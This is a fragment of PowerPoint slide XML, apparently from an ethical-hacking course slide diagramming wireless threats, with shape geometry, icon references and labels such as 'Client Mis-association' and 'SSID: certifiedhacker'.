                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T1" fmla="*/ 61 h 1139"/>
                  <a:gd name="T2" fmla="*/ 0 w 4016"/>
                  <a:gd name="T3" fmla="*/ 1139 h 1139"/>
                  <a:gd name="T4" fmla="*/ 0 w 4016"/>
                  <a:gd name="T5" fmla="*/ 1080 h 1139"/>
                  <a:gd name="T6" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T7" fmla="*/ 0 h 1139"/>
                  <a:gd name="T8" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T9" fmla="*/ 61 h 1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16"/>
                  <a:gd name="T16" fmla="*/ 0 h 1139"/>
                  <a:gd name="T17" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T18" fmla="*/ 1139 h 11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16" h="1139">
                    <a:moveTo>
                      <a:pt x="4016" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1080"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="6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6" name="Freeform 2305"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="5037" y="658"/>
                <a:ext cx="267" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3123"/>
                  <a:gd name="T1" fmla="*/ 61 h 898"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 898 h 898"/>
                  <a:gd name="T4" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T5" fmla="*/ 839 h 898"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 0 h 898"/>
                  <a:gd name="T8" fmla="*/ 0 w 3123"/>
                  <a:gd name="T9" fmla="*/ 61 h 8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23"/>
                  <a:gd name="T16" fmla="*/ 0 h 898"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 898 h 89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23" h="898">
                    <a:moveTo>
                      <a:pt x="0" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6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7" name="Freeform 2306"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4694" y="677"/>
                <a:ext cx="343" cy="98"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T1" fmla="*/ 62 h 1139"/>
                  <a:gd name="T2" fmla="*/ 0 w 4016"/>
                  <a:gd name="T3" fmla="*/ 1139 h 1139"/>
                  <a:gd name="T4" fmla="*/ 0 w 4016"/>
                  <a:gd name="T5" fmla="*/ 1078 h 1139"/>
                  <a:gd name="T6" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T7" fmla="*/ 0 h 1139"/>
                  <a:gd name="T8" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T9" fmla="*/ 62 h 1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16"/>
                  <a:gd name="T16" fmla="*/ 0 h 1139"/>
                  <a:gd name="T17" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T18" fmla="*/ 1139 h 11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16" h="1139">
                    <a:moveTo>
                      <a:pt x="4016" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1078"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="6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8" name="Freeform 2307"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="5037" y="698"/>
                <a:ext cx="267" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3123"/>
                  <a:gd name="T1" fmla="*/ 61 h 900"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 900 h 900"/>
                  <a:gd name="T4" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T5" fmla="*/ 839 h 900"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 0 h 900"/>
                  <a:gd name="T8" fmla="*/ 0 w 3123"/>
                  <a:gd name="T9" fmla="*/ 61 h 9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23"/>
                  <a:gd name="T16" fmla="*/ 0 h 900"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 900 h 9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23" h="900">
                    <a:moveTo>
                      <a:pt x="0" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="900"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6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9" name="Freeform 2308"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4694" y="717"/>
                <a:ext cx="343" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T1" fmla="*/ 62 h 1139"/>
                  <a:gd name="T2" fmla="*/ 0 w 4016"/>
                  <a:gd name="T3" fmla="*/ 1139 h 1139"/>
                  <a:gd name="T4" fmla="*/ 0 w 4016"/>
                  <a:gd name="T5" fmla="*/ 1080 h 1139"/>
                  <a:gd name="T6" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T7" fmla="*/ 0 h 1139"/>
                  <a:gd name="T8" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T9" fmla="*/ 62 h 1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16"/>
                  <a:gd name="T16" fmla="*/ 0 h 1139"/>
                  <a:gd name="T17" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T18" fmla="*/ 1139 h 11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16" h="1139">
                    <a:moveTo>
                      <a:pt x="4016" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1080"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="6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0" name="Freeform 2309"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="5037" y="737"/>
                <a:ext cx="267" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3123"/>
                  <a:gd name="T1" fmla="*/ 62 h 898"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 898 h 898"/>
                  <a:gd name="T4" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T5" fmla="*/ 839 h 898"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 0 h 898"/>
                  <a:gd name="T8" fmla="*/ 0 w 3123"/>
                  <a:gd name="T9" fmla="*/ 62 h 8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23"/>
                  <a:gd name="T16" fmla="*/ 0 h 898"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 898 h 89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23" h="898">
                    <a:moveTo>
                      <a:pt x="0" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6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1" name="Freeform 2310"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4694" y="757"/>
                <a:ext cx="343" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T1" fmla="*/ 61 h 1138"/>
                  <a:gd name="T2" fmla="*/ 0 w 4016"/>
                  <a:gd name="T3" fmla="*/ 1138 h 1138"/>
                  <a:gd name="T4" fmla="*/ 0 w 4016"/>
                  <a:gd name="T5" fmla="*/ 1077 h 1138"/>
                  <a:gd name="T6" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T7" fmla="*/ 0 h 1138"/>
                  <a:gd name="T8" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T9" fmla="*/ 61 h 1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16"/>
                  <a:gd name="T16" fmla="*/ 0 h 1138"/>
                  <a:gd name="T17" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T18" fmla="*/ 1138 h 11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16" h="1138">
                    <a:moveTo>
                      <a:pt x="4016" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1077"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="6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2" name="Freeform 2311"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="5037" y="777"/>
                <a:ext cx="267" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3123"/>
                  <a:gd name="T1" fmla="*/ 59 h 897"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 897 h 897"/>
                  <a:gd name="T4" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T5" fmla="*/ 836 h 897"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 0 h 897"/>
                  <a:gd name="T8" fmla="*/ 0 w 3123"/>
                  <a:gd name="T9" fmla="*/ 59 h 8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23"/>
                  <a:gd name="T16" fmla="*/ 0 h 897"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 897 h 89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23" h="897">
                    <a:moveTo>
                      <a:pt x="0" y="59"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="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3" name="Freeform 2312"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="5037" y="817"/>
                <a:ext cx="267" cy="76"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3123"/>
                  <a:gd name="T1" fmla="*/ 61 h 897"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 897 h 897"/>
                  <a:gd name="T4" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T5" fmla="*/ 838 h 897"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 0 h 897"/>
                  <a:gd name="T8" fmla="*/ 0 w 3123"/>
                  <a:gd name="T9" fmla="*/ 61 h 8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23"/>
                  <a:gd name="T16" fmla="*/ 0 h 897"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 897 h 89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23" h="897">
                    <a:moveTo>
                      <a:pt x="0" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="838"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6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4" name="Freeform 2313"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="5037" y="857"/>
                <a:ext cx="267" cy="76"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3123"/>
                  <a:gd name="T1" fmla="*/ 59 h 898"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 898 h 898"/>
                  <a:gd name="T4" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T5" fmla="*/ 836 h 898"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 0 h 898"/>
                  <a:gd name="T8" fmla="*/ 0 w 3123"/>
                  <a:gd name="T9" fmla="*/ 59 h 8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23"/>
                  <a:gd name="T16" fmla="*/ 0 h 898"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 898 h 89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23" h="898">
                    <a:moveTo>
                      <a:pt x="0" y="59"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="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5" name="Freeform 2314"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="5037" y="896"/>
                <a:ext cx="267" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3123"/>
                  <a:gd name="T1" fmla="*/ 61 h 898"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 898 h 898"/>
                  <a:gd name="T4" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T5" fmla="*/ 839 h 898"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 0 h 898"/>
                  <a:gd name="T8" fmla="*/ 0 w 3123"/>
                  <a:gd name="T9" fmla="*/ 61 h 8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23"/>
                  <a:gd name="T16" fmla="*/ 0 h 898"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 898 h 89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23" h="898">
                    <a:moveTo>
                      <a:pt x="0" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6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pic>
          <p:nvPicPr>
            <p:cNvPr id="230" name="Picture 2" descr="Y:\Web2.0 PNG Icons\Satellite Dish-2.png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81555" y="1651809"/>
              <a:ext cx="511503" cy="5272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1" name="Picture 3" descr="Z:\CEH v7 - Haja\Haja Premium Icons\Wireless_Modem.png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12428" y="2355453"/>
              <a:ext cx="417706" cy="41770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2" name="Picture 7" descr="Y:\CEH v7 - Haja\Haja Premium Icons\Wireless_Signal.png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80202" y="2546731"/>
              <a:ext cx="333463" cy="33346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47" name="Rectangle 246"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6642465" y="1288143"/>
              <a:ext cx="1026178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Maintenance</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="248" name="Rectangle 247"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8921053" y="3586595"/>
              <a:ext cx="2102124" cy="53091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Client Mis-association</a:t>
              </a:r>
            </a:p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SSID: </a:t>
              </a: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certifiedhacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="249" name="Group 2522"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="4147578" y="1948865"/>
              <a:ext cx="1630363" cy="473075"/>
              <a:chOff x="2158" y="2963"/>
              <a:chExt cx="3583" cy="1038"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="250" name="Freeform 2523"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="2963"/>
                <a:ext cx="3583" cy="962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 601 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 360 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 601 h 9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83"/>
                  <a:gd name="T16" fmla="*/ 0 h 962"/>
                  <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T18" fmla="*/ 962 h 9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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="601"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="601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51" name="Freeform 2524"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3502" y="3323"/>
                <a:ext cx="2239" cy="678"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 602 h 678"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 678"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 75 h 678"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 678 h 678"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 602 h 6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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 678"/>
                  <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T18" fmla="*/ 678 h 6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9" h="678">
                    <a:moveTo>
                      <a:pt x="0" y="602"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="602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52" name="Freeform 2525"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="3564"/>
                <a:ext cx="1344" cy="437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 437"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 437"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 437 h 437"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 75 h 437"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 437"/>
                  <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T18" fmla="*/ 437 h 4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4" h="437">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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53" name="Oval 2526"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2900" y="3679"/>
                <a:ext cx="170" cy="4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54" name="Oval 2527"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3145" y="3613"/>
                <a:ext cx="170" cy="4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55" name="Oval 2528"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3389" y="3547"/>
                <a:ext cx="170" cy="4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56" name="Oval 2529"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3634" y="3481"/>
                <a:ext cx="170" cy="4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57" name="Oval 2530"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3877" y="3417"/>
                <a:ext cx="173" cy="4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58" name="Oval 2531"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4123" y="3351"/>
                <a:ext cx="173" cy="4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59" name="Oval 2532"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4366" y="3285"/>
                <a:ext cx="170" cy="4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0" name="Oval 2533"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4612" y="3219"/>
                <a:ext cx="170" cy="4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1" name="Oval 2534"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4858" y="3155"/>
                <a:ext cx="170" cy="4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62" name="Group 483"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="5470186" y="1234226"/>
              <a:ext cx="2044700" cy="860425"/>
              <a:chOff x="210" y="2018"/>
              <a:chExt cx="1288" cy="542"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="263" name="Freeform 5"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="210" y="2215"/>
                <a:ext cx="1288" cy="345"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 161"/>
                  <a:gd name="T1" fmla="*/ 22 h 44"/>
                  <a:gd name="T2" fmla="*/ 81 w 161"/>
                  <a:gd name="T3" fmla="*/ 0 h 44"/>
                  <a:gd name="T4" fmla="*/ 161 w 161"/>
                  <a:gd name="T5" fmla="*/ 22 h 44"/>
                  <a:gd name="T6" fmla="*/ 81 w 161"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 161"/>
                  <a:gd name="T9" fmla="*/ 2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44">
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="44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2B2B2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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64" name="Group 6"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="427" y="2018"/>
                <a:ext cx="613" cy="467"/>
                <a:chOff x="857" y="2014"/>
                <a:chExt cx="1859" cy="1416"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="265" name="Group 7"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="857" y="2014"/>
                  <a:ext cx="1516" cy="1416"/>
                  <a:chOff x="643" y="1954"/>
                  <a:chExt cx="1516" cy="1416"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="278" name="Group 8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643" y="1954"/>
                    <a:ext cx="1503" cy="1295"/>
                    <a:chOff x="643" y="1954"/>
                    <a:chExt cx="1503" cy="1295"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="310" name="Freeform 9"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1">
                      <a:off x="1072" y="2127"/>
                      <a:ext cx="428" cy="1006"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 898"/>
                        <a:gd name="T1" fmla="*/ 241 h 2114"/>
                        <a:gd name="T2" fmla="*/ 0 w 898"/>
                        <a:gd name="T3" fmla="*/ 2114 h 2114"/>
                        <a:gd name="T4" fmla="*/ 898 w 898"/>
                        <a:gd name="T5" fmla="*/ 1873 h 2114"/>
                        <a:gd name="T6" fmla="*/ 896 w 898"/>
                        <a:gd name="T7" fmla="*/ 0 h 2114"/>
                        <a:gd name="T8" fmla="*/ 0 w 898"/>
                        <a:gd name="T9" fmla="*/ 241 h 211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898" h="2114">
                          <a:moveTo>
                            <a:pt x="0" y="241"/>
                          </a:moveTo>
                          <a:lnTo>
